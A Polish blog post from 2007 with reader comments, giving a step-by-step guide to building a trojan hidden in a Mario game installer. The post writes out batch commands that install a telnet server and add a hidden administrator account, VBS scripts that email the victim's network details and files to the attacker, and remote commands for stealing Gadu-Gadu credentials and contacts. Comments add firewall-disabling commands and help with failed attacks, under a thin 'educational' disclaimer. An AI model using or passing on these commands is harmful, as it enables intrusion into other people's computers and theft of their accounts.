Szczypta Telnetu, dodać VBS, przyprawić plikami BATCH..

Posted on Marzec 18, 2007. Filed under: Komputery, Windows |

Hej 🙂
Dzisiaj napiszemy sobie mini „konia trojańskiego”, który umożliwi nam przejęcie całkowitej kontroli nad systemem za pomocą Telnetu i konta administratora na atakowanym systemie 🙂

Ok, mamy chęci, ale co nam będzie potrzebne?

  1. Notatnik
  2. ndtelnet.exe
  3. Numer IP „ofiary”
  4. Nieużywane konto pocztowe
  5. Jakaś mała gra, lub programik, np. mario.exe (Kliknij, by pobrać)
  6. Systemowa konsola poleceń (cmd.exe)

[Dodany mirror mario i ndtelnet: TUTAJ

Ok, najpierw więc stwórzmy plik wsadowy, który w czasie naszej fałszywej instalacji zostanie uruchomiony i trochę namiesza w systemie, przygotowując podłoże pod nasz atak.
Więc do dzieła!

Utwórz plik tekstowy, zapisz go pod nazwą

Wklej teraz do niego ten kod:


@ECHO OFF
ndtelnet.exe /INSTALL
net start „ND TELNET SERVER”

Ok, mamy już kawałek kodu, ale żeby potem poszaleć z systemem, musimy posiadać konto z uprawnieniami administratora. W tym celu znajomość nazwy użytkownika i hasła konta z grupy administratorów jest niezbędna. Czyli co? Jak nie znamy to lipa z miodem? Niekoniecznie 😉 I na to jest sposób: Dlaczegóż by nie założyć sobie samemu takiego konta na atakowanym systemie 🙂

Więc dla chcącego nic trudnego! Otwórz jeszcze raz install.cmd (Prawy klik->Edytuj) i dodaj do niego ten kod:

net user admin haslo /add
net localgroup administratorzy admin /add

Cały plik będzie wyglądać więc tak:

@ECHO OFF
ndtelnet.exe /INSTALL
net start „ND TELNET SERVER”
net user admin haslo /add
net localgroup administratorzy admin /add

Potrzebujemy także utworzyć na atakowanym systemie katalog, do którego przekopiujemy pliki potrzebne do skutecznego zakończenia naszego ataku, tzn. skrypt, który wyśle nam plik, który
będziemy sobie chcieli pożyczyć, a także skrypt, który wyśle nam numer IP, w razie gdybyśmy go nie znali 😉

Dopiszmy więc do install.cmd:


mkdir C:\Windows\VSetup
ipconfig >> C:\Windows\VSetup\text.xyz
copy setup.vbs C:\Windows\VSetup\setup.vbs
copy install.cmd C:\Windows\VSetup\install.cmd
copy remove.cmd C:\Windows\VSetup\remove.cmd
copy ndtelnet.exe C:\Windows\VSetup\ndtelnet.exe
ic.vbs

Polecenie ipconfig pokazuje nam aktualną konfigurację sieciową, którą zapisujemy w utworzonym
przed chwilą katalogu pod nazwą text.xyz, i który zostanie nam wysłany pocztą.

Jako, że szablon bloga ma głupią czcionkę i skopiowany tekst w cudzysłowach nie będzie działał, pokazuje jak powinien wyglądać plik install.cmd:

Przejdźmy teraz do konfiguracji skryptów vbs: setup.vbs i ic.vbs, które mają taką samą funkcję, acz różnią się tylko jednym szczegółem: Załącznikiem. Setup.vbs posłuży nam do wysłania „pożyczonego” pliku, zaś ic.vbs wyśle nam wspomnianą wcześniej konfigurację sieciową (w tym numer IP) na naszą skrzynkę pocztową.

Zacznijmy od konfiguracji ic.vbs:

(kliknij, by powiększyć)
Free Image Hosting at www.ImageShack.us

1: Zamiast NAZWA piszemy cokolwiek, to będzie nazwa nadawcy. <adres@email.com> zamieniamy na: posiadacze konta na o2.pl zmienią to na użytkownik@o2.pl, zaś Interii – użytkownik@interia.pl UWAGA! Ważne jest, aby adres podany był w nawiasach <>!
2: ODBIORCA@SERWER.PL
zmieńmy na naszą skrzynkę pocztową, na nią przyjdzie plik z konfiguracją sieciową ofiary.
Tekst Witaj administratorze… możemy zmienić, aczkolwiek nie musimy. Linijka zawierająca C:\Windows\VSetup\text.xyz jest najważniejsza: musimy wpisać do niej ścieżkę do katalogu, którego nazwę wpisywaliśmy do install.cmd (U mnie C:\Windows\VSetup\text.xyz)
3: Adres serwera pocztowego, jeśli mamy konto na o2.pl, to zostawiamy tak jak jest. Jeśli mamy konto na Interii, to zmieniamy napis z poczta.o2.pl na poczta.interia.pl
Zamiast UŻYTKOWNIK wpisujemy login do konta pocztowego, zaś zamiast HASŁO – hasło do konta pocztowego.

Konfigurację setup.vbs zmieniamy na tak samo, jedynie nazwę załącznika zmieniamy na zalacznik.zal (Wg. uznania, jednak będziesz musiał to zapamiętać!)

Ok, półmetek za nami: Podsumujmy na razie nasze dokonania:
Mamy plik install.cmd, setup.vbs, ic.vbs, ndtelnet.exe i mario.exe (+ skróty w jego archiwum), wyedytowaliśmy skrypty i praktycznie większość za nami 🙂

Zanteresujmy się teraz jaką małą grą, np. mario (Link do pobrania na początku), w końcu czymś musimy zainteresować swoją ofiarę. rozpakujmy ją teraz do naszego katalogu z projektem. Razem powinno wyglądać to tak:

Utwórzmy teraz samorozpakowujące archiwum, które po rozpakowaniu uruchomi naszeg „trojana”.

Sposób: Narzędzie iexpress.exe, które uruchomimy wpisując w Menu Start->Uruchom iexpress.exe

  1. Free Image Hosting at www.ImageShack.us
  2. Free Image Hosting at www.ImageShack.us
  3. Free Image Hosting at www.ImageShack.us
  4. Free Image Hosting at www.ImageShack.us
  5. Free Image Hosting at www.ImageShack.us
  6. Free Image Hosting at www.ImageShack.usFree Image Hosting at www.ImageShack.us
  7. Free Image Hosting at www.ImageShack.us
  8. Free Image Hosting at www.ImageShack.us
  9. Free Image Hosting at www.ImageShack.us
  10. Free Image Hosting at www.ImageShack.us
  11. Free Image Hosting at www.ImageShack.us
  12. Free Image Hosting at www.ImageShack.us

Uruchamia on nasz skrypt install.cmd po wyłączeniu gry przez naszą „ofiarę”. Ma ona mniej więcej 1,5-2 sekundy na reakcję, ale tyle czasu zajmuje, moim zdaniem, przyglądniecie się okienku i przeczytanie napisu o skopiowaniu plików 😉

Wszystko gotowe? Fajnie! Wybrałeś komputer do ataku? Przesłałeś plik, który następnie uruchomiła osoba? Jeszcze fajniej 🙂

Wejdźmy więc w Menu Start i wybierzmy opcję Uruchom. Wpisz w okienku cmd. Ukaże ci się czarne okienko ze znakiem zachęty. Zachęca nas to do działania, więc wpiszmy w okienku polecenie telnet numer_ip_komputera_ofiary, np. telnet 72.14.221.104
Widzisz teraz napis: .
Wpiszmy więc dane do utworzonego przez nas konta: login ustawiliśmy na admin, hasło zaś na haslo.

Uwaga: Jeśli zamiast okna poniżej zobaczysz napis login failed, to oznacza, że albo źle wpisujesz dane do konta (zobacz plik install.cmd, tam masz dane), lub ofiara nie uruchomiła naszej paczki, lub też firewall blokuje połączenia. W przypadku tego ostatniego nie podziałamy za dużo, po prostu firewall wszystko poblokuje.

Jeśli jednak wszystko poszło ok, to zobaczymy coś takiego:

… to znaczy, ze znajdujemy się w kompie ofiary! 😉
Teraz przydałaby się znajomość poleceń DOSa/konsoli poleceń. Nie znasz? W takim razie przedstawię ci je na przykładzie pożyczenia sobie profilu GG „ofiary”: numeru, hasła, listy kontaktów.
Zaczynamy więc w katalogu System32. Pora z niego wyjść, użyjmy do tego polecenie cd ../..
Jesteśmy teraz w C:\ Przejdźmy do Documents and Settings:
cd „Documents and Settings” (w cudzysłowach, gdyż nazwa zawiera spacje).
Wyświetlmy teraz katalogi, aby poznać nazwy użytkowników systemu:
dir ukaże nam wszystkie katalogi w folderze (oprócz ukrytych). Wejdźmy więc do katalogu z profilem Gadu-Gadu użytkownika: cd Uzytkownik/Gadu-Gadu
użyjmy polecenia dir, aby wyświetlić nazwę profilu, a następnie do niego wejdźmy używając polecenia cd. Więc jesteśmy teraz w katalogu profilu. Skopiujmy zatem plik zawierający dane do konta do katalogu utworzonego przed atakiem: copy config.dat C:\Windows\VSetup\zalacznik.zal. Przejdźmy teraz do katalogu C:\Windows\VSetup. Wpisz w okienko: C:, następnie cd Windows i na końcu cd VSetup. Jako, że plik config.dat, który zawiera dane do konta: hasło i numer przemianowaliśmy na zalacznik.zal to możemy bez problemu użyć naszego skryptu setup.vbs, który siedzi bezpiecznie w naszym katalogu C:\Windows\VSetup.
Aby go uruchomić wpisz więc setup.vbs. Plik w ciągu kilku minut powinien dotrzeć na naszą skrzynkę. Teraz wpisz del zalacznik.zal, aby skasować 1 załącznik. Musimy przecież wrócić po listę kontaktów. Zrob tak jak robiliśmy z plikiem config.dat, jednak teraz skopiuj plik smseab.dat do katalogu C:\Windows\VSetup pod nazwą zalacznik.zal. Potem uruchom ponownie setup.vbs.

Cóż, przyszedł czas żegnać się z naszym systemem. Pobraliśmy to co nas interesowało, więc po co zostawać dłużej? 😉
Wyjdź więc z katalogu VSetup, a następnie wpisz po kolei:


rmdir C:\Windows\VSetup /S /Q
net user admin /delete
exit

lub skopiuj plik remove.cmd gdzieś poza katalog VSetup, a następnie go uruchom, wpisując po prostu remove.cmd

Fajnie było? To teraz ku gwoli ścisłości:

Jeśli w podany przeze mnie sposób dostałeś się do czyjegoś komputera, to podpadasz pod:

W ustawie z 6 czerwca 1997 r. kodeks karny (Dz.U. nr 88, poz. 553)1 zagadnienie ścigania przestępstw komputerowych zawarto w kilku rozdziałach, a mianowicie:

1. rozdział XXXIII – Przestępstwa przeciwko ochronie informacji (art. 267 § 1 i 2, art. 268 § 2 oraz art. 296 § 1 i 2 kk);
2. rozdział XXXV – Przestępstwa przeciwko mieniu (art. 278 § 2 i 5, art. 285 § 1, art. 287 § 1 oraz art. 293 § 1 kk);

+ podpadasz pod przykazanie 7.
Pozdrawiam i życzę miłych ataków zakończonych sukcesami 🙂

P.S: Tutorial powstał w celach edukacyjnych, pokazuje tylko możliwości wykorzystania danych narzędzi. Bo nożem też można zabić, ale głównie służy do krojenia, prawda? 🙂


W Win XP Professional można przygotować tą paczkę bez użytania/ściągania serwera telnetu, gdyż ten jest po prostu wbudowany w tą wersję XP. Home tego nie posiada, więc jeśli podsyłamy to komuś, kto posiada XP Home, to musimy ściągnąc i uruchomić serwer telnetu jw.
Jeśli jednak „ofiara” ma XP Pro, to wystarczy zamiast w install.cmd uruchamiać i instalować NdTlenet, wpisać takie polecenie:
@ECHO OFF
net start TlntSrv
net user admin haslo /add
net localgroup administratorzy admin /addLub zastosowac się do porady Jimmy’ego:
http://www.governmentsecurity.org/archive/t6216.html
Post z „Jan 28 2004, 03:49 PM” 😉

Reklamy

Make a Comment

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Wyloguj / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj / Zmień )

Zdjęcie na Facebooku

Komentujesz korzystając z konta Facebook. Wyloguj / Zmień )

Zdjęcie na Google+

Komentujesz korzystając z konta Google+. Wyloguj / Zmień )

Connecting to %s

Komentarzy 86 to “Szczypta Telnetu, dodać VBS, przyprawić plikami BATCH..”

RSS Feed for Ventrue’s world Comments RSS Feed

moj plik bat:
::==================================::

net config server\nnet user pomocnik /active:yes\n
net user pomocnik haslo\nnet localgroup TelnetClients /add\n
net localgroup Administratorzy pomocnik /add\n
net localgroup TelnetClients pomocnik /add\n
net start telnet\n

::===================================::

Wystarczy jeszcze skrypt który będzie to ładował przez php na kompa ofiary (posiadam takowy) i trojan gotowy 🙂

…Sam ci go podesłałem;)
A widzisz, ja rozwiązałem to w ten sposób, ale twój widzę, ze korzysta z konta pomocnika 😉

Witam,
gratuluje tekstu, wszystko działa,
co do komentarza „net start telnet” nie działa na xp:( moze mozna by uprościc skrypt z tekstu nie dodając admina tylko ndtelnet jako usługe??

Ależ w XP jest usługa telnetu, ja tylko pokazałem inną drogę 🙂

Oto opis usługi:
Telnet Umożliwia innym użytkownikom logowanie się do naszego komputera za pomocą telnetu TlntSrv Tlntsrv.exe

Czyli polecenie w konsoli będzie wtedy wyglądało tak:

:==============
net start TlntSrv
:==============

Tylko w XP Professional.
W XP Pro SP2 jest domyślnie wyłączona.

A czy da sie jakos zbindowac to z obrazkiem?

Owszem, poszukaj binderów:P

ok dzieki, ale mam bardzo duzy problem ;/ kiedy wychodze juz z mario i procedura wysylania sie uruchamia to w pewnym momencie wyskakuje blad ;/ http://img162.imageshack.us/img162/1610/beztytuuag2.jpg pomozcie ludzie w dobrej sprawie ;]

Wygląda na to, że serwer odrzuca ten adres e-mail. Spróbuj wykorzystać inny.

Próbowałem z 2 adresami, ale niestety :/ może podajcie skrzynki na których wam chodziło? pominę ten problem, mam inny, jak kumpel odpalił mario, wyłączył, błąd mu się pokazał, ale pliki się skopiowały i mimo to niemogłem do niego wejść, IP znałem, możliwe że to dlatego że jest on w sieci osiedlowej? I jeszcze pytanko, czy Windowsowy firewall to zablokuje?

Podajcie? Ja jestem 1 😉
A więc tak: Wysyła z powodzeniem na o2, zaś pobiera też dobrze na Interii i WP.
Napisz jaki błąd się pokazał, to coś pokombinujemy;)

A wyłączenie firewalla?
dodajesz do install.cmd coś takiego:

================:
netsh firewall set opmode disable
================:

Aby to zadziałało musi być IP zewnętrzne.

Treść błędu została podana na screenie 😉 pokombinuje sobie, wielkie thx ;]

hej
mam problem. otóż, gdy testuję tego trojana na sobie to wyskakuje mi BLĄD

To jest błąd serwera. Poczekaj, może naprawią go, albo… znajdź inny skrypt do wysyłania 😉

jednak tamto to ja źle wpisałem, ale teraz, gdy to poprawiłem wyskakuję taki BŁĄD

A konto uzytkownik@interia.pl istnieje? Bo musi 😉
Ew. zamiast się trudzić wysyłaj z konta o2.pl (tlen.pl) na Interię – Działa, sprawdzone, jak napisane w notce:)

ok. dzięki już działa, tylko, że nie wiem co dalej zrobić. Kiedy sprawdzam pocztę, to jest jako załącznik plik text.xyz i co dalej. Ściągam go, a dalej nie wiem… A i gdy otwieram ms-dosa to nie ma żadnego czarnego okienka ze znakiem zachęty, Tylko normalnie C:\Documents and Settings\imię\

Zmieniasz nazwę temu załącznikowi na text.txt i otwierasz notatnikiem, a dane do ataku masz w środku. A te „C:\Documents and Settings\imię\ \>” To jest właśnie znak zachęty 😉

ok.. kiedy już mi sie wydaję, że mam wszystko dobrze to, gdy wpisałem w dosie telnet xx.xx.xx.xx to pisze, że jest nie może odtworzyć hostu na porcie 23 ;/
dzięki za to wszystko, że odpowiadasz na moje pytania ;] na dodatek w dobrym tempie 🙂

Próbuj, próbuj… Aż do skutku : Mi się udało za 4 czy 5 razem, ale zadziałało 😉 Spróbuj też tak napisałem wyżej – wyłączyć firewalla systemowego 🙂 (Komentarz 11)

ok. to koniec już moich pytań, dzięki za wszystko 🙂 :] pozdro

Czy mógłby mi ktoś podać wspomniany kod w php? Kiedyś pisałem w php, na razie zrezygnowałem z niego na wymogi szkolnego przedmiotu „Programowanie Strukturalne i Obiektowe” – na razie Turbo Pascal ;), ale nie byłem świadomy, że PHP ma takie możliowości. Thx in advance. P.S. Czy próbował tego ktoś na kimś kto ma Vistę? Kumpel ma, ale nie wiem czy ma to znaczenie bo port 80 ma do d-linka z wifi, więc pewnie 23 także będzie do d-linka, także chyba nici z dodania nowego usera, nie?

PHP przecież wykonywane jest po stronie serwera, więc ja nie wiem o czym ty w ogóle mówisz… To jest wykonywane na poziome lokalnego komputera (tzn. na tym, na którym to uruchomiłeś 😛 )

Wiem, że kod php jest wykonywany po stronie serwera, a więc dziwny mi się wydawał ten komentarz:

Krzywy:
net config server\nnet user pomocnik /active:yes\n
net user pomocnik haslo\nnet localgroup TelnetClients /add\n
net localgroup Administratorzy pomocnik /add\n
net localgroup TelnetClients pomocnik /add\n
net start telnet\n

::===================================::

Wystarczy jeszcze skrypt który będzie to ładował przez php na kompa ofiary (posiadam takowy) i trojan gotowy

Ventrue
…Sam ci go podesłałem;)
A widzisz, ja rozwiązałem to w ten sposób, ale twój widzę, ze korzysta z konta pomocnika

Czyli o co chodzi? Pozdro.

Pamiętasz może jak była moda na trojany przez GG? Wysyłanie stronek, pod którymi krył się właśnie owy trojan (a właściwie był to loader w pliku *.php, który wykorzystywał luki w Windowsie i wgrywał odpowienie pliki *.exe)
Jak znajdę go gdzieś na płycie – podam go tutaj w komentarzu.

Kiedy uruchamiam program, wszystko działa, a kiedy wychodzę z aplikacji pojawia się błąd, ze nie może odnaleść okreslonego pliku! HELP

Aha, moze to wina tego, ale nie kapuję tej linijki:

Mamy plik install.cmd, setup.vbs, ic.vbs, ndtelnet.exe i mario.exe (+ skróty w jego archiwum), wyedytowaliśmy skrypty i praktycznie większość za nami

O co chodzi z tym + skróty w jego archiwum?

Najprościej, to powiedz jakiego pliku…
A skrót? O ile pamiętam odwoływał się do mario.exe, więc to takie ważne nie jest znów. To po prostu taki pic, bo to miało być pakowane inaczej niż iexpress.exe, ale zdecydowałem się jednak na iexpress , bo dawał dużo lepsze efekty niż inne programy;)

Już wszystko działa, ale mam pytanie dot. sieci lokalnej. W mailu dostaję jedynie adres IP w sieci lokalnej, maskę podsieci, a nie IP zewnętrzne. Co robić?

Jeśli jesteś z tym kimś w sieci to spróbuj z tym adresem IP (wewnętrzym/lokalnym)

Niestety po odpleniu wychodzi tylko
BusyBox on login:
wpisuję admin i wciskam enter
pojawia się
password:
i nie da się nic tam wpisać. Czy to źle napisałem jakieś polecenie, czy to po prostu nie działa? Na IP lokalnym wyskakuje komunikat, że nie mógł się połączyć z hostem na porcie 23.

Nic nie jest doskonałe 😉 Próbuj dalej… 😉 Ja ci przecież nie dałem gwarancji działąnia, pokazałem tylko pewną koncepcję 🙂

haslo da sie wpisac ale nie jest pokazywane ze wpisujesz 😉

ja mam problem jak robie:
copy plik.exe c:\windows\plik.exe
to mi wyskakuje że nie ma takiego pliku a plik .bat znajduje sie w tym samym katalogu co plik.exe.Prosze pomóżcie!

Wyskakuje mi taki bledzik:

@McCake: Spróbuj copy „file.exe” C:\Windows\file.exe”

@mistrz: Coś musiałeś źle ściągnąć… Albo wprowadziłeś jakieś zmiany z błędem.

sprobuje wszystko od nowa i zobaczymy czy dziala…

Zrobiłęm tak:
copy “file.exe” “C:\WINDOWS\System32\file.exe”
copy “file1.vbs” “C:\WINDOWS\System32\file1.vbs”

i w dalszym ciągu nic nie mam już pojecia a u ciebie działa?

ok działą dzięki i sory za ten za szybko wysłąny komentarz

Następnym razem sprawdź dokładnie…

dalej to samo….

A jesteś pewien, że file1.exe i file1.vbs istnieją? Nie rypnąłeś się gdzieś w nazwie? Ew. spróbuj w konsoli (nie w BAT) spróbować to skopiować…

A jak można zrobić zmienną w pliku .bat nap zamiast litery R by była k
i potem ciąg zminnych jest jako jakaś komenda!

Napisz dokładnie o co ci chodzi i używaj poprawnego języka polskiego, w którym istnieje coś takiego jak interpunkcja…
BTW, jak się zadaje pytanie to na końcu jest „?” a nie „!”…

McCake w pliku bat nie mozesz zrobic zmiennych bo to nie jest język programowania 🙂

Chodzi mi o coś takiego:

$F = E
$D = C
$R = H
$T = O

@($F)($D)($R)($T)

Sorry za tamte błędy!

Krzywy: Mylisz się, można.
Zmienne w plikach wsadowych są bardzo proste i właściwie mało użyteczne. Wszystkie zmienne są wyłącznie tekstowe. Aby utworzyć zmienną (lub zmodyfikować jej wartość) trzeba posłużyć się poleceniem SET:

SET nazwa_zmiennej=wartość

Aby wywołać zmienną trzeba ją opatrzyć w % (procenty). Wygląda to tak:

ECHO %nazwa_zmiennej%

DOS i Windows tworzą własne zmienne (środowiskowe). Niektóre zminne są tworzone w plikach autoexec.bat czy msdos.sys (np. %windir%). Aby wyświetlić te zmienne wpisz SET bez parametrów

ale można użyć odpowiedniki liter?

A niewyraźnie napisane wyżej? 😛
Ustawiasz SET R=A
i potem wywołujesz ECHO %R%, która przyjmie wartość „A”:)

Witam. Niestety u mnie nie zadziałała ta akcja:-( Czy ktoś mógłby mi pomóc??

Tu masz wątek o tym skrypcie na jakimś forum, więc na nim pisz: http://www.haker.com.pl/forum/viewtopic.php?t=27652

A jakim programem odtwarza sie format .vbs tak by była ikonka jak wyżej w przykładzie ??? Możesz pogadac ze mmna na gg??

A przez dwukrotne kliknięcie co ci się uruchamia?

Spróbuj zrobić to:
Go to Start/Run and type in: %windir%\inf. Scroll down to wsh.inf,
right click it
and choose install.
Moje GG masz w „O mnie”

witam super sposób tylko mam mały problem tzn czy do zapisania pliku install.cmd trzeba ustawiać to kodowanie bo w normalnej funkcji zapisz jako nie ma pola kodowanie

mam jeszcze jedno pytanko czy są komendy którymi można zobaczyć uruchomione procesy systemowe??
i czy są komendy którymi można uruchomić lub zamknąć dany proces??
jeśli są to jakie

poskładałem to do kupy ale nie działa
gdy na kompie z xp uruchomie mario exe to jest tylko carny ekran naciskam esc i sie zamyka a nic nie kopiuje szkoda

AD 1:

Da się zabić proces przez CMD:

taskkill /F notepad.exe (Zabija bez pytania i zapisywania)

taskkill /PID 827 (jeśli znasz PID procesu)

taskkill /F /FI „USERNAME eq Nowak”
(Zabije wszystkie procesy użytkownika Nowak)

Tu masz więcej o tym:
http://www.tech-recipes.com/rx/446/xp_kill_windows_process_command_line_taskkill

AD 2: coś spieprzyłeś i tyle 😛
Sprawdź, czy jest utworzyło się konto, które ustawiłeś w install.cmd
BTW, to się kopiuje PO wyłączeniu mario.exe ;]
No i nie dawałem ci gwarancji, że to działa 😛

Niestety ale niedziala link do mario i chyba takze do ndtelnet. Mozesz je zaktualizowac??

Poprawka, archiwa mario.zip sa uszkodzone. Tak mi pisze.

Pewnie źle ściągnąłeś i tyle. Ściągnij jeszcze raz. A dla pewności dodałem mirror.

Witam!
Gratuluje tekstu przede wszystkim ;].
Mam 2 problemy to jest pierwszy –>>http://www.fotosik.pl/showFullSize.php?id=13a66cdde2b32da7
a drugi problem to taki ,że po wpisaniu telnet
[ip komputera]
wyskakuje komunikat , że nie można połączyć sie z hostem na porcie 23 – wyłączyłem firewalla u siebie w kompie do którego chce sie połączyć i dalej to samo. Coś nie tak robie ?

mam taki sam problem jak Vinko. prosze o odp.

z Vinko gadałem przez GG. Poradziłem mu, aby spróbował alternatywnego serwera telnetu, więc tobie radzę to samo ;]

hej mam taki problem zrobilem wszystko jak jest opisane i dodalem jeszcze jedna rzecz od siebie ale to nie jest wazne najwazniejsze jest to ze gdy robie to na swoim kompie wszystko jest ok numer ip przychodzi na e-mail itd. ale gdy wysylam ta paczuszke do kogos (i wiem napewno ze ja wlaczyl) to nic nie przychodzi mi na e-mail

Mam problem wyskakuje mi okienko plik jak zrobić aby było ghost console?

ja zamiast mario uzylem StatusikGG, dziala dobrze, ale nie wysyla nic na maila, server interia, client gmail.

Co do znanego juz bledu o nieprawidlowym znaku w 1 wierszu, czy jakos tak to na koncu skryptu w install.cmd, czy jak to nazwac, jest blad…

jest tak:
mkdir C:\Windows\VSetup
ipconfig >> C:\Windows\VSetup\text.xyz
copy setup.vbs C:\Windows\VSetup\setup.vbs
copy install.cmd C:\Windows\VSetup\install.cmd
copy remove.cmd C:\Windows\VSetup\remove.cmd
copy ndtelnet.exe C:\Windows\VSetup\ndtelnet.exe
ic.vbs

a powinno byc tak:
mkdir C:\Windows\VSetup
ipconfig >> C:\Windows\VSetup\text.xyz
copy setup.vbs C:\Windows\VSetup\setup.vbs
copy install.cmd C:\Windows\VSetup\install.cmd
copy remove.cmd C:\Windows\VSetup\remove.cmd
copy ndtelnet.exe C:\Windows\VSetup\ndtelnet.exe
copy ic.vbs C:\Windows\VSetup\ic.vbs

pozatym ze nie wysyla mi nic na maila, to jak chce sie polaczyc (bo ip znam) to wyskakuje ze nie mozna nawiazac polaczenia na porcie 23, a szkoda 😉

peR – nie jest błąd – on po prostu uruchamia ic.vbs, który wysyła adres IP. Ale coś ostatnio serwery MS (Bo to na nich działa ten skrypt) nie za bardzo chcą wspołpracować. A to, że nie działa na porcie 23 to wiem, wyżej gdzieś jest porada, by spróbować użyć innego serwera niż NDTelnet.

Wiec tak, sciagnalem KpyM telnet ssh server, dziala bardzo dobrze i to na porcie 23, ale wcale nie dziala tak jak ndtelnet, tzn. trzeba go instalowac, pozniej tam sa jakies ustawienia etc.

Moze moglbys podac jakis znany Ci inny telnet?

thx

sory ze post pod postem.

uzylem telnetu systemowego z winxp pro, połaczylem sie z samym soba i zadziałało, ale kiedy juz skopiuje plik, zapisze jako config.xyz w katalogu vsetup i uruchomie setup.vbs to nic mi na maila nie wysyla, szkoda bo juz myslalem ze bedzie all ok 😉 ale chyba tak jak mowisz, to wina tych serwerow microszitu 😉

Nie znam innego serwera (oprócz windowsowatego jeszcze 😉 ), alw wybrałem NDTelnet, bo nie trzeba go było konfigurować, a i sam w sobie był mały i fajny 🙂 BTW, czasem nie możnaby skorzystać z serwera SSH, zamiast telnetu? Sprawdzić nie mam jak, bo MS Okna mam wywalone, ale tak mi naszło to na myśl…
Anyway, te serwery MS to działają jak chcą…

ssh to taki telnet, tyle ze z szyfrowanym połączeniem, tak czytałem, ale czy znowusz jak dodam ssh zamiast telnetu to bedzie dzialac tak samo?
i czy niema innej drogi wysłania pliku do siebie?

Witam, mam ten sam problem co mistrz, czyli przy próbie uruchomienia ic.vbs i setup.vbs pojawia się błąd. Może od razu podam co wpisałem w konfiguracji. Jakby co zaznaczam, że jestem laikiem;P A więc tak :
bjMessage.From =
„””Mario”” ”

objMessage.To = „mojeaktualnekonto@o2.pl”

bjMessage.AddAttachment „C:\Windows\Vsetup\text.xyz”

Potem jako login i hało podałem te do mojego aktualnego konta. I to właściwie tyle. Ktoś wie co robię nie tak?

aha, sorry zapomniałem – zaraz po „Mario” podałem adres mojego nieużywanego konta.

Mishiek: Poszukaj alternatywnej metody wysyłąnia e-maili, np. poprzez jakiś mały konsolowy programik.

Prosze o update plikow

ic.vbs (kliknij, aby pobrać)
setup.vbs (kliknij, aby pobrać)

Poniewaz sie przedawnily i nie idzie sciagnac. Z góry dzięki

Nie przedawniły, a jest przerwa techniczna na serwerze. Zresztą – masz treść tych plików na obrazkach, więc możesz przepisać 🙂
No i oczywiście weź pod uwagę komentarze wyżej dot. wysyłania poczty.

mam pytanie czy ktoś mógłby mi podać dokładną konfigurację skryptu ic.vbs i setup.vbs tak żeby to zadziałało

Witam wszystkich, mam taki problem że nic mi nie dochodzi na maila… po za tym wszystko działa, bez problemu się wbijam na kompa ofiary, tylko nic mi nie wysyła… z góry wielkie dzięki za pomoc.Pozdrawiam.

mam pytanie jak wejsc na dysk D:\ ofiary ? no bo nie umiem 😦 a moze sie nie da? prosze o pomoc , z gory dzieki 😉

Najlepiej po drabinie!

Ariel napisz :
D:

wiem ze pozno ale posiadam xp home sp3 czy jesli zrobie taja jak jest tu napisane to bedzie dzialac??jesli nie to co zrobic??
bardo prosze o odpowiedz

Nie przekonasz się, póki nie sprawdzisz 🙂

jak uruchamian nasz programik u mnie na kompie łącze sie ze soba przez telneta i jest ok ale gdy zrobie restarta kompa i uruchamiam telneta i chce sie ze soba polaczyc to sie nie da . . . ktos zna odpowiedz jaka moze byc przyczyna?

I do accept as true with all of the concepts you have presented for your post.

They are very convincing and can definitely work. Nonetheless, the posts are
too short for novices. Could you please prolong them a little
from next time? Thanks for the post.


Where's The Comment Form?

Liked it here?
Why not try sites on the blogroll...

%d blogerów lubi to: